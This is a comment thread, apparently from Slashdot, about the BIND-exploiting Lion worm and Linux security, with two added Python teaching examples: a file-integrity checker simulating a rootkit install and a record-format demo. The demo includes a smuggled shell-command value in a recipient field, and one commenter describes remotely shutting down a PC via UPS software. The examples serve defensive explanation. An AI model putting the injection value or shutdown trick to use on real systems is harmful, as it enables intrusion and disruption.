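version.bind is self-reported and can be set to anything in named.conf, so "hidden" or even "fixed" proves nothing about the binary actually listening; treat the query as a way to find servers that admit to 8.2.x, and confirm the rest from the installed package on the host.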
Regardless, you should have tripwire or something running anyway.
What you should do is uninstall services you don't need. And if you absolutely need a named server, run something that doesn't have a history of being cracked.
Je ne parle pas francais.
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
Nope, I think most reasonable people who read this site will agree that it's better to be rooted than to run a free secure alternative.
Remember, the 'all bugs are shallow with enough eyeballs' only applies if the bugs are under GPL.
UNIX philosophy: Small utilities that only do one thing really well, then chain them together to form a bigger whole.
Bind is probably just as prevalent, being that if each network has one computer running BIND, and the other computers trust that computer to any extent, they're basically exposed as well. Don't forget that most "server" installs install BIND (so far as I've seen - your mileage may vary).
And outlook isn't one of those programs that people "have to have" to be compatible. Not at home, if you're just checking POP mail. And only at work if your employers settled on Exchange as their mail server... And who cares there anyway? It's not your computer, you're working under orders, you've gotta use the software they give you... But outlook so far as I've noticed, communicates really well with the outside world - Mac & PC versions work fine, sending just about any attachment to any other mail client. My company's use of outlook forces no one else to use it, my point being.
If you're still running BIND instead of, say, djbdns, well, what the hell is wrong with you? Death to the Buggy Internet Name Daemon.
Agreed, but it's a rather damning indictment of Linux if after so many years and so many eyeballs, the 'standard' services still have security holes. Just MHO.
I don't care if it's 90,000 hectares. That lake was not my doing.
Funny, the MSN and AOL login icons on the default Windows desktop had me thinking that it was designed for networking. Or maybe it was just never really designed at all...
If people stopped giving root God-like powers then problems like this wouldn't crop up. Patches like LIDS help put root in a jail. Someday we can pray that root, and all the trust and power that goes along with UID 0, will go away completely.
Nearly everybody did see it coming. And it will come again. That's why you fix your vulnerabilities as they are discovered.
Caution: Now approaching the (technological) singularity.
I think we've pushed this "anyone can grow up to be president" thing too far.
At least he put caps in there;) Seriously, he needed it to be as confusing and arousingly exciting as possible, since spell-checked, well-reasoned, insightful story comments are generally chucked at first glance. Taco's criteria seems to be, "If the submitter thought about it long enough to write this much, of this quality, it's not sensational enough to post."
--
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
I don't mean to split hairs, but the word "virii" makes my skin crawl, the same way "irregardless" or "it's" used possessively does...
I'll shut up now... :-)
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Ahh, that wonderful ego showing its head again. Yes, all sysadmins wish they could be as perfect as you.
Lose the attitudes, people. Mistakes are made, patches are overlooked. It happens. It will continue to happen. There's nothing that can be done about it. And your arrogance isn't doing the rest of the world any good.
Perhaps, instead of insulting and complaining, you should try actually helping. You know a sysadmin that's a little weak in some areas? Give 'em a hand. Help 'em out. Be proactive.
You wonder why so many non-techies view us as raving lunatics, or arrogant shits. This is why. All we ever seem to do is foam at the mouth about how everything not Linux is evil, and that Open Source is the One True Way. And then we strut around like pumped-up little martinets, so convinced of our own greatness, and the mistaken belief that we are infallible.
Anyone here who makes the claim that they have never made a mistake configuring a server has either never configured a server, or is lying through their teeth.
But then, I suppose that for us to admit that we have screwed up from time to time would then force us to admit that we're not nearly as perfect as we like to think, and that, just perhaps, those egos and attitudes we've stroked so hard aren't worth a damn.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
Understood. And my point isn't that you should go out and fix every system that exists. That's impossible. What I'm saying is that, instead of showering SlashDot, and the rest of the world, with more of this "I'm the King of the SysAdmins" ego crap, you should do what you can to help prevent these problems from propagating.
What will you do if one of your friends whom you've warned doesn't update his system? Are you going to insult him? Call him stupid? "Gee, I'm really sorry you got rooted. If you weren't so stupid, this wouldn't have happened." I'm sure he'll have tons of respect for you after that.
Sorry, that was getting a bit personal, which is not at all what I intend.
Anyway, my point is that we, as a community, need to move away from the collective Holier-Than-Thou attitude that has become so deeply ingrained. The Linux movement is based strongly on the concept of a group of people helping each other to find the best solution to a problem. The solution slips out of our reach when we become a bunch of egomaniacal bastards.
If someone you know (that's any of you out there!) does get rooted by this exploit, don't thrash them for not updating their system. Instead, give them a hand. Help them recover from the damage. Offer suggestions on how to prevent these sorts of problems in the future. If they don't understand, teach them. You don't have to be Superman; if all you do is help one person, then that's one less computer that's at risk.
We're not at war with each other, gentlemen (and ladies!) We're at war with the little monkeyshits who take advantage of these exploits to do damage.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
The version of bind that is being exploited is exploitable on all systems, not just Linux.
The problem lies in the very fact that linux is becoming more and more popular. A few years ago, it wasn't worth the effort to write a virus for linux because there just weren't that many linux systems out there, and they all varied enormously in their file system structure.
Nowadays, there are lots of installations, and their structure is similar enough that some malicious dude can write a bunch of scripts, and have a good chance of successfully cracking root, getting into the system and causing it to subsequently crack other systems.
That person could easily do the same thing for Solaris, or HPUX, or Irix, but that takes extra time. The exact nature of the exploit, as well as what is required to convince the system to propagate the virus, changes with each OS. Given the much smaller number of these systems out there, it simply isn't worth the effort.
Linux is making itself a target simply by becoming popular, in the same way that Windows is currently the prime target.
Really, then try this. Install qmail/svscan on a system with sendmail installed. Then try to start up qmail using svscan without shutting down sendmail. Then watch your system load jump to 5+ and your system grind to a halt. And yes it is easy to get into this situation if for example you forget to shut down sendmail during a transition to qmail or you accidentally forget to remove sendmail from the list of daemons started up at boot.
"When you sit with a nice girl for two hours, it seems like two minutes. When you sit on a hot stove for two minutes, it
I just put it up and I'm sure it won't be up long since I posted the IP on /.
any way I will reload again soon
It's just for play so it doesn't matter if it gets screwed
but I have worried that someone might use it for evil purposes.
http://Lenny.com
You mean like this system?
http://64.252.15.27
As far as the Microsoft shills who say that now they (the paid MSFT shills)
Well, heck, in that case, I claim that you are a paid Linux shill!
Come on -- do you SERIOUSLY think that Microsoft would bother stooging a site like this? Its credibility is much better served by the pro OSS and Linux advocates who rabidly jump against Microsoft every chance they get.
Occam's razor - skins em every time.
Simon
Coming soon - pyrogyra
So, yes, I seriously do think that MSFT "stooges" Slashdot. MSFT has such a track record that I believe any pro-MSFT opinion expressed in a public forum has to be viewed with a fair amount of suspicion.
I think that any pro-ANYTHING opinion expressed in a public forum has to be viewed with a fair amount of suspicion. Same with any negative-ANYTHING opinion.
Simon
You wonder why so many non-techies view us as raving lunatics, or arrogant shits. This is why. All we ever seem to do is foam at the mouth about how everything not Linux is evil, and that Open Source is the One True Way. And then we strut around like pumped-up little martinets, so convinced of our own greatness, and the mistaken belief that we are infallible.
Actually as a techie, I view a lot of Slashdot's population in exactly the same way. It's a tool, people -- not a religion.
Tools chip, break, and fall apart. All tools do.
Simon
When problems are more widely discussed and understood, they allow the common Internet vandal (script kiddie) the ability to point and click their way through denial of service attacks, web site defacement and the like.
They don't scare me the way the real criminals do: the ones that are serious and determined, and who are good enough to not get caught. I doubt these guys/gals share the tricks of the trade.
Now, let's shift focus to closed-source software. Most if not all closed-source software is, for obvious reasons, owned by companies interested in making a profit. Naturally, the larger the install base, the larger the company. Big companies move slowly at doing nearly everything. What business sense would there be in a big company announcing a problem before they had a solution?
I'd wager that nearly every time a closed-source software package has released a security-related patch, any number of people have been quietly exploiting these scary problems.
I'd prefer to have no security holes, but if I had to choose I'd rather face a script kiddie than an experienced, determined cracker....
No OS is impervious to worms, virii, trojans, etc. ... Quit using it as a reason to "make the switch to linux" in your anti-microsoft banter; you're not fooling anyone.
Yeah, but that's the equivalent of saying no nation is free of diseases. There are some places in the world you'd rather be (America, Europe, Japan, etc.) than others (Somalia, Haiti, Ghana). Better hospitals and better sanitation would be good reasons to prefer the more powerful industrialized nations. If anyone's been claiming that Linux (and UNIX in general) is invulnerable, then they really need to ask themselves why there even is an effort to make systems like OpenBSD. However, saying that one outbreak of a worm makes Linux on the same level as Windows in terms of security is like claiming that the LA riots made America equivalent to Palestine in terms of social stability.
Yes, there are Linux worms. Yes, there are Linux root-kits, designed to exploit well-known bugs in programs distributed with certain Linux distributions. Does that mean that Linux is anywhere near as vulnerable as Windows? I don't think so. Security is still a reason to switch from Windows to Linux, and a knowledgeable person who actually cares about security can put together a nearly bulletproof box with a little effort.
Could you say the same for Windows? Maybe, but it's a lot harder and takes away a lot more functionality to do so because there are fewer alternative solutions to replace the builtin solutions. (No IIS, no "Windows Networking", no Outlook, no IE, etc.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
What is really needed in Linux is the ability for various distributions to automatically install security updates. I realize that many admins have written scripts to do this, but this should be a default option. For dialup users, it should check for updates every time the user connects to the Internet, and for 24/7 connections it should check for updates once a day.
This post is encrypted twice with ROT-13. Documenting or attempting to crack this encryption is illegal.
Which is totally useless if the rootkit hides itself by loading a kernel module.
For the goatse.cx wary, go to www.securityfocus.com and search for "Analysis of the KNARK rootkit".
Hands in my pocket
> GNU/Linux Worm? Is there a dash between anal and retentive?
-- queef
Oh, wait. I'm one of those Linux-using bastards.
No boom today. Boom tomorrow. There's always a boom tomorrow. - Cmdr. Susan Ivanova
So for us non-specialists, it's not an option to say "Turn everything off" - and while I'm competent, I'm not an expert, and I don't have the time (or the energy!) to check bugtraq once a day. Sigh - what we need is a sysadmin who'll take care of our linux machines along with the "supported" Solaris boxen...
Anyway - at least I'm not running sendmail! (Always look on the brii--iight side...")
"I will take the Ring," he said, "though I do not know the way."
A couple of friends and I got hit by this exploit a couple of weeks ago. How did I find out? The sendmail failed to send out my passwd file (it kills off bind :) )! Imagine my surprise when it popped up in my inbox four days later. A quick halt, trot down to the shop to get RH7, burn a CD with all the updates, and re-install later, I'm up and back.
I think my machine was being used in a DOS attack at the time too, since it was sending out a lot of traffic. Maybe it was being used to target the other systems on the subnet. Who knows. I didn't do much in the way of investigation. I was remote at the time, and I pay for traffic. :)
Now, I've got a slightly more secure firewall, and I've turned off a bunch of services, and I've got tripwire running. I'm still seeing TCP connections on port 53 though, so lots of people are getting infected/running the exploit.
Jason Pollock
It goes "Dans le jungle, terrible jungle, le lion est mort ce soir".
That is "... the lion is dead tonight"
Makes more sense really, celebrating that it's died, rather than that it's sleeping. Otherwise the singing would probably wake it up ...
perl -e 'fork||print for split//,"hahahaha"'
I know their reputation, but I have never looked at the source and so I don't know why (or whether) they deserve that reputation. Anyone care to elucidate? (If possible, with a better explanation than "they're written in C". So's Apache, and it's not known for being riddled with holes (I'm sure there's been some, but its reputation isn't like BIND's or Sendmail's)).
perl -e 'fork||print for split//,"hahahaha"'
If I'm not mistaken, this worm exploits the same BIND vulnerability discussed here. So if you've upgraded BIND, you ought to be okay.
Right?
Tripwire has split into a commercial version and an open source version.
--
Anyone want to chat with the author, Lion? I tracked him down to a Chinese IRC server. It was quite interesting to talk to him. If the worm hit your machine, he's got your passwd file.
Is what Apache normally runs under. You've basically described how it works.
Cheers,
Rick Kirkland
But how would Tripwire help against the Lion worm? Wouldn't it just rub your nose in the fact you'd just got 0wnd? JJ
"And the meaning of words; when they cease to function; when will it start worrying you?"
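What a Tripwire-style check actually buys you against a rootkit, as an added example that is not Tripwire's code and not part of any post above: hash every regular file under a tree once from a known-good state, store that manifest off the box, and later diff the tree against it. The fake /bin tree, the replaced ps, the added backdoor and the setuid bit are all constructed for the demo.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Hex digest of one file, read in chunks so large binaries are fine."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record digest, permission bits and size of every regular file under root.
    Mode bits matter too: a rootkit that leaves /bin/ls byte-identical but
    flips setuid on it is still a change worth flagging."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # symlinks are skipped; their targets are hashed on their own
            st = os.lstat(path)
            rel = os.path.relpath(path, root)
            baseline[rel] = {
                "sha256": file_digest(path),
                "mode": st.st_mode & 0o7777,
                "size": st.st_size,
            }
    return baseline


def dump_baseline(baseline):
    """Serialise the manifest; keep this copy off the machine (floppy, read-only media)."""
    return json.dumps(baseline, sort_keys=True, indent=1)


def compare(root, baseline):
    """Diff the live tree against a stored manifest."""
    current = build_baseline(root)
    changed = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return {"changed": changed, "added": added, "removed": removed}


def demo():
    """Constructed scenario: take a baseline, then simulate a rootkit install."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        for name in ("ps", "netstat", "ls"):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(b"#!/bin/sh\necho real %s\n" % name.encode())
            os.chmod(os.path.join(bindir, name), 0o755)
        baseline = json.loads(dump_baseline(build_baseline(root)))

        # Simulated rootkit: trojaned ps that filters its own processes,
        # a planted backdoor, netstat removed, and ls made setuid.
        with open(os.path.join(bindir, "ps"), "wb") as f:
            f.write(b"#!/bin/sh\n/bin/ps.real | grep -v t0rn\n")
        with open(os.path.join(bindir, "in.telnetd"), "wb") as f:
            f.write(b"backdoor")
        os.remove(os.path.join(bindir, "netstat"))
        os.chmod(os.path.join(bindir, "ls"), 0o4755)
        return compare(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The caveat the thread already raises still applies: if the rootkit loads a kernel module, every read() the checker makes goes through a kernel that is lying to it, so the comparison only means something when run from known-good media (boot from CD, mount the disk read-only) with a manifest that was never stored on the compromised box.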
Strictly speaking you are absolutely correct and I stand corrected.
However, my argument still stands because most users don't consider their kernel to be their OS, and they consider their Operating System to be Linux and not GNU (which it really is as debian HURD developers will quickly point out to you). So the difference is largely a misnomer...
My point here would be that desktop users may want choices, but more importantly, they want intelligent default choices to be made for them by their distributions so they don't ever have to worry about it. This includes not defaulting to buggy software or worm vulnerable builds of BIND. A good OS will instill confidence in the user by making good default choices on their behalf (which Windows/Mac do well) and allowing them to inspect and change them if they desire (which linux does well). Both of these are the responsibility of the distro if linux is ever to move over to the desktop.
-pos
The truth is more important than the facts.
-Frank Lloyd Wright
First of all... This is a linux problem and not just a Bind problem because bind gets installed in a lot of distributions by default. It's the same people who talk about linux taking over the desktop who later say that it's the user's fault that they should know what their machine is doing.
If linux is just for hackers, then fine. BUT, if you have ever expressed that you want linux to be the default instead of Mac, Windows or whatever then you owe it to yourself to be realistic about why most people use computers. It's probably different than why you do, and it's probably because they just want software that does a job for them. They don't care how it works and they shouldn't have to. We don't make fun of people who don't know what happened when their car breaks. Sure... it's respectable to know why, but it's not a sin not to.
And second...
Regardless, you should have tripwire or something running anyway
That is a total cop-out! I'm sure every one here knows that a windows user would get absolutely jumped on if they said something like that about windows security. "Security hole in windows? you should be running antivirus software. It's your own fault."
flame on.
-pos
The truth is more important than the facts.
-Frank Lloyd Wright
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-by-default-installations" thought here...
These "people" are you and me, the admins. This problem is clearly the admin's fault.
There is very little truth in your statement these days. On most recent distros you have to choose explicitly to be a server. If you don't, you have to explicitly choose to install and enable BIND. Truth be known, I doubt there are very many KDE workstations out there running named.
No, the blame lies in lazy (or nonexistent?) sysadmins. Let's face it; why is your server running BIND if it doesn't need to (you chose it from the install...)? If the machine is a nameserver, then when the advisory came out in January, did you patch up right away? If not, WHY NOT? The vendors got updated RPMs and whatnot out fairly quickly.
For the non-existent admin problem, things like the Redhat network will help tremendously.
Not trying to flame here, but your ranting sounds like the parents who blame high-school shootings on video games and movies, when they should be pointing in the mirror. To all the slack admins out there: Enough of this sh*t. Suck it up and do your damn jobs.
FWIW, installs are getting very savvy these days, taking up the slack for the poor job a lot of admins out there are doing; check out RH's latest beta (wolverine?) install - it does ipchains config during the install.
Don't sweat the petty things. But do pet the sweaty things.
Bah, positive comments mean more to me (as they should to anyone) than moderation. Thanks.
-bugg
So unless you're a Linux user, or an X86 BSD user who's so whacked out he's running a linux binary of bind, you aren't affected by this worm.
-bugg
Nope, that's a trojan. Here's a quick explanation of the different terms for malicious code:
Trojan Horse ("Trojan") A Trojan is a standalone program that the user is tricked into running, which will in turn do bad things.
Virus. A virus is a program that attaches itself to (infects) executables- usually anything that's run while the virus is in memory. When an infected program is executed on a system that does not already have the virus in memory, it will usually load itself into memory for the purpose of infecting yet another system. They really haven't been seen much in recent years, as it's too much hassle and requires much more intelligence than other malicious programs. I'm sure a good portion of the slashdot audience will remember viruses such as Michelangelo, Dark Avenger, PC-Stoned!, etc. (I was hit by Michelangelo on its second run-around)
Worms. A worm is any malicious program that propagates itself directly to other machines (usually via a network) whereas a virus relies on the execution of an infected program, and a trojan relies on execution of itself.
I hope that clears it up :)
-bugg
Hence the usefulness of quoting.
-bugg
Tripwire (under GPL since last year) is available at tripwire.org or through their Sourceforge project. This should have been posted with the story (if he's going to mention it, why not link it).
Not many home users or desktop people would be running bind...
Bind is installed for a default redhat install? I doubt that....but it's been a while since I had to do an install. Bind-utils I'm sure is installed, as those are common tools. I believe it contains nslookup and similar things. If bind-utils were installed by default, there isn't a problem. And I doubt the named daemon is installed at all for a desktop. If it is, I doubt it's even running, so little harm would be done.
Qmail runs fine alongside Sendmail. Dunno what your problem was, but that wasn't it.
Possible running qmail-smtpd under some superserver that was misbehaving might be your problem, but not Qmail.
Anyone who doesn't know about the TSIG bug must be living in a cave somewhere. I heard about it on my car radio on a general news & traffic station (WBBM 780, Chicago).
In the network
...with apologies to the tokens...
The mighty network
The Lion creeps tonight
All together now!
In the network
The mighty network
The Lion creeps tonight
-drin
If the hoax is yours, fix the image -- it's broken.
LOL! I am seriously considering clicking that "Shutdown System" button...
Hello little man. I will destroy you!
If you do have a domain, don't run bind. It's in the same hole-a-week club as the FTP servers and Sendmail. Don't run bind.
If you absolutely must run bind, get the latest one, compile it static and run it chrooted as a user/group specifically created JUST to run bind.
Next week's class: Don't run FTPD.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Well then you're not running bind are you? Maybe I should have said Bind.
I think my message here is don't run Bind. You know what I'm saying?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good
IIRC Tripwire is GPL now. But in any case I prefer AIDE myself.
Now all I need to do is hack the DNS entry for the upgrade server, and watch the users connect and automagically r00t themselves with my trojaned binaries.
The answer to this problem is of course, public key security. Sort of like the Microsoft signing keys that were obtained illegitimately just this week?
Even Microsoft doesn't automatically install security updates, their 'critical update notifier' simply tells users that an upgrade is needed, you still need to take positive action to install patches.
I do not deploy Linux. Ever.
It's a different philosophy, just a small part of why Linux distros are vulnerable where other operating systems are not...
I do not deploy Linux. Ever.
IIRC, Dan really dislikes syslog, so this may not be far from the truth.
I do not deploy Linux. Ever.
This is not a perfect world. Just because you do not know of any exploitable root holes in sshd, telnetd, apache, etc today, does not mean that one will not be found tomorrow.
It is not uncommon for exploits to be discovered and traded in the black-hat community for days, months or even years before being made public.
To believe that you will not be targeted by 'real crackers' because you are not an interesting target is a naive and dangerous assumption.
I do not deploy Linux. Ever.
Competing apps should continue to compete, but badly written monolithic software that requires root access and is a long-running source of exploits (BIND and sendmail come to mind) should be gotten rid of, not kept around for the sake of 'diversity'.
The reason that DJBDNS is not exploited where BIND is is not because one is more popular, but because BIND is written so badly that nothing short of throwing it away and starting from the ground up (as DJBDNS has done) will fix it.
I do not deploy Linux. Ever.
There are way to many machines running full services when only one or two listening processes are really needed, if that.
I do not deploy Linux. Ever.
Both Sendmail and BIND suffer from the same basic problem- they are huge monolithic programs that must be executed as root to perform their intended duties.
From the Qmail web site: Why is qmail secure? The reason I started the qmail project was that I was sick of the security holes in sendmail and other MTAs. Here's what I wrote in December 1995:
As it turned out, fourteen security holes were discovered in sendmail in 1996 and 1997. I followed seven fundamental rules in the design and implementation of qmail:
sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster.
In qmail, programs and files are not addresses. The local delivery agent, qmail-local, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-local makes sure that neither ~user nor ~user/.qmail is world-writable.)
Security impact: .qmail, like .cshrc and .exrc and various other files, means that anyone who can write arbitrary files as a user can execute arbitrary programs as that user. That's it.
A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything.
Of the twenty most recent sendmail security holes, eleven worked only because the entire sendmail system is setuid.
Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue.
The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root.
Even if qmail-smtpd, qmail-send, qmail-rspawn, and qmail-remote are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these four.
In fact, these programs don't even trust each other. They are in three groups: qmail-smtpd, which runs as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others.
(From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.)
I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces.
The essence of user interfaces is parsing: converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data.
When another programmer wants to talk to a user interface, he has to quote: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data.
This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way.
When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the Majordomo injection security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting.
In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options.
All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA.
Keep It Simple, Stupid
I do not deploy Linux. Ever.
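The "parsing versus quoting" point in the qmail text quoted above, shown as an added example that is not qmail's code and not part of the comment: a line-oriented record format where every writer must quote and every reader must parse, next to a text0-style format (single-character command, value, NUL terminator) where the separator can never occur inside a value, so there is no quoting layer to get wrong. The command letters F, T and P and the hostile address are assumptions constructed for the demo, not qmail's queue format.

```python
def encode_lines(records):
    """Line-oriented 'user interface' format: one 'cmd value' per line.
    Nothing stops a value from containing a newline, and this writer does
    not quote it, so the reader sees an extra record."""
    return "".join(f"{cmd} {value}\n" for cmd, value in records)


def decode_lines(text):
    """The matching parser. It cannot tell an injected line from a real one."""
    out = []
    for line in text.splitlines():
        if not line:
            continue
        cmd, _, value = line.partition(" ")
        out.append((cmd, value))
    return out


def encode_text0(records):
    """text0 style: one-byte command, the raw value, a 0 byte.
    A C string cannot contain NUL, so the terminator is unambiguous; the only
    'quoting' is to refuse a value that contains one."""
    buf = bytearray()
    for cmd, value in records:
        if len(cmd) != 1 or "\x00" in value:
            raise ValueError("record cannot be represented")
        buf += cmd.encode() + value.encode() + b"\x00"
    return bytes(buf)


def decode_text0(data):
    """Split on NUL; the value is everything after the command byte, verbatim."""
    out = []
    for chunk in data.split(b"\x00")[:-1]:  # trailing NUL leaves an empty tail
        if not chunk:
            raise ValueError("empty record")
        out.append((chr(chunk[0]), chunk[1:].decode()))
    return out


def demo():
    # Constructed attacker-controlled recipient: smuggles a second record
    # (hypothetical "P" = deliver to program) through the line-based format.
    hostile = "victim@example.org\nP /bin/sh -c 'id > /tmp/pwned'"
    records = [("F", "alice@example.org"), ("T", hostile)]
    via_lines = decode_lines(encode_lines(records))
    via_text0 = decode_text0(encode_text0(records))
    return via_lines, via_text0


if __name__ == "__main__":
    lines, text0 = demo()
    print("line format read back", len(lines), "records:", lines)
    print("text0 format read back", len(text0), "records:", text0)
```

The line format hands the reader three records, the third one a command the sender never issued; the text0 format hands back exactly the two that were written. The same failure shape is behind the log-injection and header-injection bugs of later years: a separator that legitimately occurs in attacker data, plus a writer and reader that disagree about how it is escaped.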
It brings me great pleasure to see nasty virii like this attacking Linux in particular. I'll have to remember this next time my MS-hater friends tell me how the newest email Trojan (that you have to click on, ignore the warning, and execute) for Outlook proves that Windows is so shitty compared to linux. No OS is impervious to worms, virii, trojans, etc. ... Quit using it as a reason to "make the switch to linux" in your anti-microsoft banter; you're not fooling anyone.
____________________
Remember, not all /. users hate Windows or think Microsoft is out to get them!
Prevent linux based DDOS's!
http://linux.denialofservice.org/
"One World, one Web, one Program" - Microsoft promotional ad
The Anti-Blog
The correct way to respond to this is "we've found a problem, now let's make sure this problem doesn't happen again". I want to be proud of linux, I want linux to be a great operating system, that's not going to happen as long as we concentrate more on blaming others for their mistakes and downplaying ours than working on solutions.
This comment in particular bothers me.
Why should I need to run tripwire or any security software? If an OS is secure an idiot should be able to administer it and not worry about worms/backdoors/viruses. I like the slogan "secure by default".
I'm a computer scientist, not a writer so no comments on the grammar or spelling please.
Environmentalists are their own worst enemy. ~tricklenews.com
Well, the machine seems to be down now. Was this by chance a system running some sort of UPS software?
:(. I fear the day when he gets DSL and uses Win98 ICS to share it.
My dad's got a Belkin UPS that comes with some software for Win2K that opens port 80 for remote usage. I found this one day when nmapping his machine. The software doesn't seem to open the port in Win98, though. It does listen to port 80 on any network interface, though, which I tested. I got online on one machine, got online on his (dialups), got his IP, and browsed to http://AAA.BBB.CCC.DDD on the other machine. Over the net, I was able to shut down his Win2k machine. As in, it went through the shutdown procedure and turned itself off (APM support).
Granted, he himself admits that he isn't concerned about security and would just start with a completely open system and then close it over time. Though, he never did
So, anyone that's using a Belkin UPS with their Bulldog (or Watchdog, I forget which) software on Win2k (and a USB interface, maybe. I'm not sure if the serial version would work the same way.) please please close that port. I believe it may simply be the loading of a certain DLL. If nothing else, run a firewall on that machine and block untrusted IPs on port 80. What a stupid reason to be taken down! "Hackers turned off my server! HEEEELLLLP!"
kickin' science like no one else can,
my dick is twice as long as my attention span.
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
Wow! I never knew Linux could be so insecure ;-).
:) ?
Um, perhaps I'm being stupid, but aren't you even the least bit concerned that your generosity might cause you problems?
I mean, it's very cool of you to leave a system up and open like that. But there are lots of people out there (curious or malicious) that would cause trouble that I know I wouldn't want to have to deal with.
Has leaving your system open like that ever caused you trouble with anyone else? Say, another admin who was attacked via your server which is open due to your, hm, kindness
kickin' science like no one else can,
my dick is twice as long as my attention span.
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
Why is it that whenever a M$ product gets attacked by malware it's because of crappy security in the OS, but when linux gets attacked it's because the OS has "finally arrived"? Hmmmm...
Ok, this is a troll, but I'll bite.
I have nothing against Theo's code, I know the original poster apparently does, and I'd like to hear his reasoning for it. Theo's personality leaves a lot to be desired, but that's another subject entirely.
Dan Bernstein's code, on the other hand, is horrible.
Consider:
$ grep "void main" -r qmail-1.03/ | wc -l
61
There is no reason why he should make such an amateurish error. I mean, it looks like he's trying to win the obfuscated C contest.
Take this piece of code:
What was that? Well, it'd be nice if he'd get out of grade school and start using descriptive variable names. I love a puzzle, but 'x' and 'n' are absurd.
He has a very noncanonical way to handle function arguments, but it's his project, and if that floats his boat, so be it. What I really have problems with is his brace style. Not that I really mind any consistent style, but when it changes at random, it begins to look very unprofessional.
Oh yeah, and about that malloc. See, around these parts, malloc returns a pointer to void, so it strikes me as being a bit odd that 'x' would be a char pointer. I suppose c001 d00dz like DJB are too 1337 for casts.
I don't use DJB's code because it's not free. But even if it were, it is written unacceptably poorly.
Jordan Bettis
``Wherever you go, there's another stupid sigfile quote.''
I don't get it. Why is everyone complaining it's Linux's fault. How is a rogue program written god knows when the OS's fault. If I install Back Orifice on a windows machine you don't see people running around yelling "It's Windows' Fault!" No, it's the fact that a program running with admin privileges opened a hole. So what?
Blame it on the original writer of BIND. Or patch it! Heck you'd be the first one to toss on a service pack at moments release. But you expect open source to be perfect at version 1.0?
An exploit in BIND does not make BIND nor the OS responsible for who or what goes through that hole. Yes, the hole needs a patch. And yes, maybe a watchdog like program that monitors privileged processes like a babysitter might be nice. But get a grip. It's not Linus's, Eric's, Larry's, or Linux or GNU or..... Go to the source and fix it. Heck you'd run make bind if a new version of it came out, what's so hard about a patch -p0 < ../bind.patch?
And what's with everyone knocking X? It seems to work fine for me and aside from quake (which should be run in the console without X anyway) I run that sucker pretty ragged. Never had a software issue. (Well, except for me being stupid and not RTFM'ing)
Ok. FlameBait 0.02 complete.
"Remember, who is the boss of you!"
> SELECT * FROM brain_cells WHERE synaptic_rate > 0
0 row returned
Come on people. It's the new millennium.
Fortunately, most users aren't running BIND, and if they are, it's only on one box. So the fix is that much easier.
Black holes are where the Matrix raised SIGFPE
I'm so glad to see that CmdrTaco is promoting the proliferation of Linux into the community of average (read: "most") computer users with such a supportive, nurturing, and positive comment such as this. The arrogant tone of the comment makes me want to advise all of my non-expert computer using friends to download Mandrake, install it with no help from a Linux expert (it's so easy you don't need one anyway), and then proceed to use and learn it without any help from anyone, since it's so easy and intuitive. And, of course they'll all know to install tripwire "or something" because it's just that obvious.
Thanks again, CmdrTaco; you are a true representative of the Linux community in everything you say and do.
-------------------------
Stupid people suck.
